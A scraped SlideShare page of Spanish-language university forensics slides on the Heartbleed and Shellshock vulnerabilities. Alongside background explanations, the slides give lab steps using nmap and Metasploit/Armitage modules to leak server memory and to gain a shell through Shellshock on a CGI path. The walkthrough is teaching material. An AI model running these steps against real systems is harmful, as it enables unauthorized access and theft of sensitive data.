SlideShare una empresa de Scribd logo
1 de 30
Descargar para leer sin conexión
Caso de estudio No. 1: Heartbleed & Shellshock
Caso de estudio No. 1: Heartbleed & Shellshock
Inform´atica Forense
Francisco Medina L´opez
paco.medina@comunidad.unam.mx
http://aulavirtual.capacitacionentics.com/
Universidad Nacional Aut´onoma de M´exico
Facultad de Contadur´ıa y Administraci´on
2018-2
Caso de estudio No. 1: Heartbleed & Shellshock
Agenda
1 Heartbleed
Vulnerabilidad
Explotaci´on
2 Shellshock
Antecedentes
Vulnerabilidad
Explotaci´on
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Vulnerabilidad
1 Heartbleed
Vulnerabilidad
Explotaci´on
2 Shellshock
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Vulnerabilidad
¿Qu´e es Heartbleed?
Definici´on
Vulnerabilidad detactada en la biblioteca OpenSSL utilizada para
la creacion de certificados SSL, que permite a los atacantes
obtener contrase˜nas, n´umeros de tarjetas de cr´edito y otra
informaci´on sensible directamente de los servidores afectados.
Se di´o a conocer el 8 de abril del 2014.
Un mal manejo de l´ımites en memoria y el uso
repetido de memoria no correctamente
asignada/liberada causa fugas de informaci´on
arbitraria.
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Vulnerabilidad
Algunos servidores afectados
https://visual.ly/community/infographic/computers/major-sites-affected-heartbleed
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Explotaci´on
1 Heartbleed
Vulnerabilidad
Explotaci´on
2 Shellshock
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Explotaci´on
Paso 1: Detectar la vulnerabilidad
nmap -p 443 --script ssl-heartbleed 192.168.150.3
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Explotaci´on
Paso 2: Inicia metasploit
msfconsole
use auxiliary/scanner/ssl/openssl heartbleed
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Explotaci´on
Paso 3: Explotar la vulnerabilidad
set RHOSTS 192.168.150.3
set verbose true
exploit
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Explotaci´on
Paso 4: Analizar resultados
Caso de estudio No. 1: Heartbleed & Shellshock
Heartbleed
Explotaci´on
Noticas recientes
https://www.seguridad.unam.mx/historico/noticia/index.html-noti=3140
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Antecedentes
1 Heartbleed
2 Shellshock
Antecedentes
Vulnerabilidad
Explotaci´on
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Antecedentes
Componentes de un sistema operativo
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Antecedentes
/bin/bash
Definici´on
Bash (Bourne-again shell) es un programa inform´atico, cuya
funci´on consiste en interpretar ´ordenes, y un lenguaje de consola.
Es una shell de Unix compatible con POSIX y el int´erprete de
comandos por defecto en la mayor´ıa de las distribuciones
GNU/Linux, adem´as de macOS. Tambi´en se ha llevado a otros
sistemas como Windows y Android1.
1
https://es.wikipedia.org/wiki/Bash
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Antecedentes
Variables de ambiente en bash
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Antecedentes
Variables de ambiente en bash (2)
Se pueden invocar variables existentes o crear nuevas variables.
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Antecedentes
Funciones en bash
Pueden ser definidias dentro de scripts (.sh).
Pueden ser definidas desde la l´ınea de comandos.
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Antecedentes
Funciones en bash (2)
Pueden ser definidias como variable de ambiente (env).
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Vulnerabilidad
1 Heartbleed
2 Shellshock
Antecedentes
Vulnerabilidad
Explotaci´on
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Vulnerabilidad
¿Qu´e es Shellshock?
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Vulnerabilidad
¿Qu´e es Shellshock?
Definici´on
Shellshock, tambi´en conocida como Bashdoor, es una familia de
errores de seguridad en el ampliamente usado interprete de
comandos Bash de Unix. El primero de estos bugs fue divulgado el
12 de septiembre de 2014. 2.
Varios servicios de internet tal como algunas
implementaciones de servidores web usan Bash
para ciertos procesos, esto le permit´ıa al
atacante ejecutar comandos arbitrarios en
versiones vulnerables de Bash, de esta forma el
atacante pod´ıa ganar acceso no autorizado al
sistema atacado.
2
https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Vulnerabilidad
L´ınea de tiempo
Fuente: A Global Empirical Analysis of the Shellshock
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Vulnerabilidad
Heat-map of scanned vulnerable sites by country
Fuente: A Global Empirical Analysis of the Shellshock
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Vulnerabilidad
Sistemas operativos m´as afectados
Fuente: A Global Empirical Analysis of the Shellshock
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Explotaci´on
1 Heartbleed
2 Shellshock
Antecedentes
Vulnerabilidad
Explotaci´on
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Explotaci´on
Paso 1: Detectar URL vulnerable
Inicia Burp Suite.
Configura tu navegador web para hacer uso de Burp.
Entra al sitio a analizar.
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Explotaci´on
Paso 2: Inicia Armitage
Agrega la direcci´on IP del objetivo.
Attacks → Find attacks.
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Explotaci´on
Paso 3: Explotar la vulnerabilidad
Selecciona la vulnerabilidad apache mod cgi bash env exec
Configura el siguiente par´ametro:
set TARGETURI /cgi-bin/status
Explota la vulnerabilidad.
Caso de estudio No. 1: Heartbleed & Shellshock
Shellshock
Explotaci´on
Paso 4: Toma el control del equipo
Clic derecho sobre el objetivo, selecciona Shell → Interact.
Caso de estudio No. 1: Heartbleed & Shellshock
Referencias bibliogr´aficas
Referencias bibliogr´aficas
https://www.seguridad.unam.mx/historico/noticia/index.html-
noti=1659
https://www.seguridad.unam.mx/historico/noticia/index.html-
noti=1665
Desarrollo seguro de aplicaciones con criptograf´ıa
Shellshock, Tudor Enache
A Global Empirical Analysis of the Shellshock

Más contenido relacionado

Similar a Caso estudio Heartbleed Shellshock

Mitos y-realidades-linux-y-los-virus
Mitos y-realidades-linux-y-los-virusMitos y-realidades-linux-y-los-virus
Mitos y-realidades-linux-y-los-virusGilmar Campana Quispe
 
Webshelldetector
WebshelldetectorWebshelldetector
WebshelldetectorTensor
 
Taller virus angelica cabrera
Taller virus angelica cabreraTaller virus angelica cabrera
Taller virus angelica cabreraAngélica Cabrera
 
Historia de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan SaccoHistoria de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan SaccoJuan Sacco
 
Semana 1 -_quick_tours_guia_de_ejercicios_resuelta
Semana 1 -_quick_tours_guia_de_ejercicios_resueltaSemana 1 -_quick_tours_guia_de_ejercicios_resuelta
Semana 1 -_quick_tours_guia_de_ejercicios_resueltavictdiazm
 
Semana 1 quick tours guia de ejercicios resuelta
Semana 1   quick tours guia de ejercicios resueltaSemana 1   quick tours guia de ejercicios resuelta
Semana 1 quick tours guia de ejercicios resueltavictdiazm
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
Curso de hacking avanzado
Curso de hacking avanzadoCurso de hacking avanzado
Curso de hacking avanzadoYULI-CASTRO
 
Linux basico-8.PDF
Linux basico-8.PDFLinux basico-8.PDF
Linux basico-8.PDFULEAM
 
Evolución de las soluciones antimalware
Evolución de las soluciones antimalwareEvolución de las soluciones antimalware
Evolución de las soluciones antimalwareEventos Creativos
 
9700132 el-sendero-del-hacker
9700132 el-sendero-del-hacker9700132 el-sendero-del-hacker
9700132 el-sendero-del-hackerivanboss9930
 
El sendero del hacker
El sendero del hackerEl sendero del hacker
El sendero del hackernoc_313
 

Similar a Caso estudio Heartbleed Shellshock (20)

Mitos y-realidades-linux-y-los-virus
Mitos y-realidades-linux-y-los-virusMitos y-realidades-linux-y-los-virus
Mitos y-realidades-linux-y-los-virus
 
Curso linux clase_1_2012
Curso linux clase_1_2012Curso linux clase_1_2012
Curso linux clase_1_2012
 
Linux
LinuxLinux
Linux
 
Webshelldetector
WebshelldetectorWebshelldetector
Webshelldetector
 
Taller virus angelica cabrera
Taller virus angelica cabreraTaller virus angelica cabrera
Taller virus angelica cabrera
 
Taller virus
Taller virusTaller virus
Taller virus
 
Curso linux clase_2_2012
Curso linux clase_2_2012Curso linux clase_2_2012
Curso linux clase_2_2012
 
arquitectura-de-linux
arquitectura-de-linuxarquitectura-de-linux
arquitectura-de-linux
 
VHDL_2.pdf
VHDL_2.pdfVHDL_2.pdf
VHDL_2.pdf
 
Historia de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan SaccoHistoria de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan Sacco
 
Semana 1 -_quick_tours_guia_de_ejercicios_resuelta
Semana 1 -_quick_tours_guia_de_ejercicios_resueltaSemana 1 -_quick_tours_guia_de_ejercicios_resuelta
Semana 1 -_quick_tours_guia_de_ejercicios_resuelta
 
Semana 1 quick tours guia de ejercicios resuelta
Semana 1   quick tours guia de ejercicios resueltaSemana 1   quick tours guia de ejercicios resuelta
Semana 1 quick tours guia de ejercicios resuelta
 
Curso básico linux
Curso básico linuxCurso básico linux
Curso básico linux
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bis
 
Curso de hacking avanzado
Curso de hacking avanzadoCurso de hacking avanzado
Curso de hacking avanzado
 
Linux basico-8.PDF
Linux basico-8.PDFLinux basico-8.PDF
Linux basico-8.PDF
 
Evolución de las soluciones antimalware
Evolución de las soluciones antimalwareEvolución de las soluciones antimalware
Evolución de las soluciones antimalware
 
Anonimo el libro hacker
Anonimo   el libro hackerAnonimo   el libro hacker
Anonimo el libro hacker
 
9700132 el-sendero-del-hacker
9700132 el-sendero-del-hacker9700132 el-sendero-del-hacker
9700132 el-sendero-del-hacker
 
El sendero del hacker
El sendero del hackerEl sendero del hacker
El sendero del hacker
 

Más de Francisco Medina

Tema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad InformáticaTema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad InformáticaFrancisco Medina
 
Tema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridadTema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridadFrancisco Medina
 
Tema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridadTema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridadFrancisco Medina
 
Tema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosTema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosFrancisco Medina
 
Por qué es importante cuidar mi privacidad en Internet
Por qué es importante cuidar mi privacidad en InternetPor qué es importante cuidar mi privacidad en Internet
Por qué es importante cuidar mi privacidad en InternetFrancisco Medina
 
Tema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad InformáticaTema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad InformáticaFrancisco Medina
 
2021-1 Presentación de la materia Seguridad Informática
2021-1 Presentación de la materia Seguridad Informática2021-1 Presentación de la materia Seguridad Informática
2021-1 Presentación de la materia Seguridad InformáticaFrancisco Medina
 
Administración de Servidores WINDOWS T1
Administración de Servidores WINDOWS T1Administración de Servidores WINDOWS T1
Administración de Servidores WINDOWS T1Francisco Medina
 
Tema 3. Seguridad en las Comunicaciones
Tema 3. Seguridad en las ComunicacionesTema 3. Seguridad en las Comunicaciones
Tema 3. Seguridad en las ComunicacionesFrancisco Medina
 
Presentación de la materia Seguridad Informática 2017-2
Presentación de la materia Seguridad Informática 2017-2Presentación de la materia Seguridad Informática 2017-2
Presentación de la materia Seguridad Informática 2017-2Francisco Medina
 
Presentación de la materia Seguridad en redes 2017-2
Presentación de la materia Seguridad en redes 2017-2Presentación de la materia Seguridad en redes 2017-2
Presentación de la materia Seguridad en redes 2017-2Francisco Medina
 
Presentación del Módulo 6. Seguridad en Base de Datos
Presentación del Módulo 6. Seguridad en Base de DatosPresentación del Módulo 6. Seguridad en Base de Datos
Presentación del Módulo 6. Seguridad en Base de DatosFrancisco Medina
 
Módulo 3. Tema 1. Cableado Estructurado
Módulo 3. Tema 1. Cableado EstructuradoMódulo 3. Tema 1. Cableado Estructurado
Módulo 3. Tema 1. Cableado EstructuradoFrancisco Medina
 
Presentación Módulo 3. Tecnología de conectividad en redes.
Presentación Módulo 3. Tecnología de conectividad en redes.Presentación Módulo 3. Tecnología de conectividad en redes.
Presentación Módulo 3. Tecnología de conectividad en redes.Francisco Medina
 
Tema 1, Introducción a la Informática Forense
Tema 1, Introducción a la Informática ForenseTema 1, Introducción a la Informática Forense
Tema 1, Introducción a la Informática ForenseFrancisco Medina
 

Más de Francisco Medina (20)

Tema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad InformáticaTema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad Informática
 
Tema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridadTema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridad
 
2021 1 T4-Criptografía
2021 1 T4-Criptografía2021 1 T4-Criptografía
2021 1 T4-Criptografía
 
Tema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridadTema 3. Arquitectura y diseño de seguridad
Tema 3. Arquitectura y diseño de seguridad
 
Tema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosTema 2: Análisis de Riesgos
Tema 2: Análisis de Riesgos
 
Por qué es importante cuidar mi privacidad en Internet
Por qué es importante cuidar mi privacidad en InternetPor qué es importante cuidar mi privacidad en Internet
Por qué es importante cuidar mi privacidad en Internet
 
Tema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad InformáticaTema 1. Introducción a la Seguridad Informática
Tema 1. Introducción a la Seguridad Informática
 
Conociendo la Dark Web
Conociendo la Dark WebConociendo la Dark Web
Conociendo la Dark Web
 
2021-1 Presentación de la materia Seguridad Informática
2021-1 Presentación de la materia Seguridad Informática2021-1 Presentación de la materia Seguridad Informática
2021-1 Presentación de la materia Seguridad Informática
 
Tema 1. Active Directory
Tema 1. Active DirectoryTema 1. Active Directory
Tema 1. Active Directory
 
Administración de Servidores WINDOWS T1
Administración de Servidores WINDOWS T1Administración de Servidores WINDOWS T1
Administración de Servidores WINDOWS T1
 
Tema 3. Seguridad en las Comunicaciones
Tema 3. Seguridad en las ComunicacionesTema 3. Seguridad en las Comunicaciones
Tema 3. Seguridad en las Comunicaciones
 
2017-2 Tema 2. Identidad
2017-2 Tema 2. Identidad2017-2 Tema 2. Identidad
2017-2 Tema 2. Identidad
 
Presentación de la materia Seguridad Informática 2017-2
Presentación de la materia Seguridad Informática 2017-2Presentación de la materia Seguridad Informática 2017-2
Presentación de la materia Seguridad Informática 2017-2
 
Tema 1. Seguridad Física
Tema 1. Seguridad FísicaTema 1. Seguridad Física
Tema 1. Seguridad Física
 
Presentación de la materia Seguridad en redes 2017-2
Presentación de la materia Seguridad en redes 2017-2Presentación de la materia Seguridad en redes 2017-2
Presentación de la materia Seguridad en redes 2017-2
 
Presentación del Módulo 6. Seguridad en Base de Datos
Presentación del Módulo 6. Seguridad en Base de DatosPresentación del Módulo 6. Seguridad en Base de Datos
Presentación del Módulo 6. Seguridad en Base de Datos
 
Módulo 3. Tema 1. Cableado Estructurado
Módulo 3. Tema 1. Cableado EstructuradoMódulo 3. Tema 1. Cableado Estructurado
Módulo 3. Tema 1. Cableado Estructurado
 
Presentación Módulo 3. Tecnología de conectividad en redes.
Presentación Módulo 3. Tecnología de conectividad en redes.Presentación Módulo 3. Tecnología de conectividad en redes.
Presentación Módulo 3. Tecnología de conectividad en redes.
 
Tema 1, Introducción a la Informática Forense
Tema 1, Introducción a la Informática ForenseTema 1, Introducción a la Informática Forense
Tema 1, Introducción a la Informática Forense
 

Último

Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Rosabel UA
 
5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdf
5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdf5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdf
5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdfOswaldoGonzalezCruz
 
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdfFichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdfssuser50d1252
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docxLuisAndersonPachasto
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOweislaco
 
Técnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesTécnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesRaquel Martín Contreras
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfssuser50d1252
 
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024gharce
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Angélica Soledad Vega Ramírez
 
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfMapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfvictorbeltuce
 
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaManejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaLuis Minaya
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUgustavorojas179704
 
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfssuser50d1252
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxYeseniaRivera50
 

Último (20)

Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024
 
Sesión La luz brilla en la oscuridad.pdf
Sesión  La luz brilla en la oscuridad.pdfSesión  La luz brilla en la oscuridad.pdf
Sesión La luz brilla en la oscuridad.pdf
 
5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdf
5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdf5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdf
5° SEM29 CRONOGRAMA PLANEACIÓN DOCENTE DARUKEL 23-24.pdf
 
Aedes aegypti + Intro to Coquies EE.pptx
Aedes aegypti + Intro to Coquies EE.pptxAedes aegypti + Intro to Coquies EE.pptx
Aedes aegypti + Intro to Coquies EE.pptx
 
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdfFichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdf
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
 
Técnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesTécnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materiales
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
 
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...
 
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfMapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
 
recursos naturales america cuarto basico
recursos naturales america cuarto basicorecursos naturales america cuarto basico
recursos naturales america cuarto basico
 
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaManejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
 
La luz brilla en la oscuridad. Necesitamos luz
La luz brilla en la oscuridad. Necesitamos luzLa luz brilla en la oscuridad. Necesitamos luz
La luz brilla en la oscuridad. Necesitamos luz
 
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdfTema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
Tema 7.- E-COMMERCE SISTEMAS DE INFORMACION.pdf
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
 
Earth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversaryEarth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversary
 
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
 

Caso estudio Heartbleed Shellshock

  • 1. Caso de estudio No. 1: Heartbleed & Shellshock Caso de estudio No. 1: Heartbleed & Shellshock Inform´atica Forense Francisco Medina L´opez paco.medina@comunidad.unam.mx http://aulavirtual.capacitacionentics.com/ Universidad Nacional Aut´onoma de M´exico Facultad de Contadur´ıa y Administraci´on 2018-2
  • 2. Caso de estudio No. 1: Heartbleed & Shellshock Agenda 1 Heartbleed Vulnerabilidad Explotaci´on 2 Shellshock Antecedentes Vulnerabilidad Explotaci´on
  • 3. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Vulnerabilidad 1 Heartbleed Vulnerabilidad Explotaci´on 2 Shellshock
  • 4. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Vulnerabilidad ¿Qu´e es Heartbleed? Definici´on Vulnerabilidad detactada en la biblioteca OpenSSL utilizada para la creacion de certificados SSL, que permite a los atacantes obtener contrase˜nas, n´umeros de tarjetas de cr´edito y otra informaci´on sensible directamente de los servidores afectados. Se di´o a conocer el 8 de abril del 2014. Un mal manejo de l´ımites en memoria y el uso repetido de memoria no correctamente asignada/liberada causa fugas de informaci´on arbitraria.
  • 5. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Vulnerabilidad Algunos servidores afectados https://visual.ly/community/infographic/computers/major-sites-affected-heartbleed
  • 6. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Explotaci´on 1 Heartbleed Vulnerabilidad Explotaci´on 2 Shellshock
  • 7. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Explotaci´on Paso 1: Detectar la vulnerabilidad nmap -p 443 --script ssl-heartbleed 192.168.150.3
  • 8. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Explotaci´on Paso 2: Inicia metasploit msfconsole use auxiliary/scanner/ssl/openssl heartbleed
  • 9. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Explotaci´on Paso 3: Explotar la vulnerabilidad set RHOSTS 192.168.150.3 set verbose true exploit
  • 10. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Explotaci´on Paso 4: Analizar resultados
  • 11. Caso de estudio No. 1: Heartbleed & Shellshock Heartbleed Explotaci´on Noticas recientes https://www.seguridad.unam.mx/historico/noticia/index.html-noti=3140
  • 12. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Antecedentes 1 Heartbleed 2 Shellshock Antecedentes Vulnerabilidad Explotaci´on
  • 13. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Antecedentes Componentes de un sistema operativo
  • 14. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Antecedentes /bin/bash Definici´on Bash (Bourne-again shell) es un programa inform´atico, cuya funci´on consiste en interpretar ´ordenes, y un lenguaje de consola. Es una shell de Unix compatible con POSIX y el int´erprete de comandos por defecto en la mayor´ıa de las distribuciones GNU/Linux, adem´as de macOS. Tambi´en se ha llevado a otros sistemas como Windows y Android1. 1 https://es.wikipedia.org/wiki/Bash
  • 15. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Antecedentes Variables de ambiente en bash
  • 16. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Antecedentes Variables de ambiente en bash (2) Se pueden invocar variables existentes o crear nuevas variables.
  • 17. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Antecedentes Funciones en bash Pueden ser definidias dentro de scripts (.sh). Pueden ser definidas desde la l´ınea de comandos.
  • 18. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Antecedentes Funciones en bash (2) Pueden ser definidias como variable de ambiente (env).
  • 19. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Vulnerabilidad 1 Heartbleed 2 Shellshock Antecedentes Vulnerabilidad Explotaci´on
  • 20. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Vulnerabilidad ¿Qu´e es Shellshock?
  • 21. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Vulnerabilidad ¿Qu´e es Shellshock? Definici´on Shellshock, tambi´en conocida como Bashdoor, es una familia de errores de seguridad en el ampliamente usado interprete de comandos Bash de Unix. El primero de estos bugs fue divulgado el 12 de septiembre de 2014. 2. Varios servicios de internet tal como algunas implementaciones de servidores web usan Bash para ciertos procesos, esto le permit´ıa al atacante ejecutar comandos arbitrarios en versiones vulnerables de Bash, de esta forma el atacante pod´ıa ganar acceso no autorizado al sistema atacado. 2 https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
  • 22. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Vulnerabilidad L´ınea de tiempo Fuente: A Global Empirical Analysis of the Shellshock
  • 23. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Vulnerabilidad Heat-map of scanned vulnerable sites by country Fuente: A Global Empirical Analysis of the Shellshock
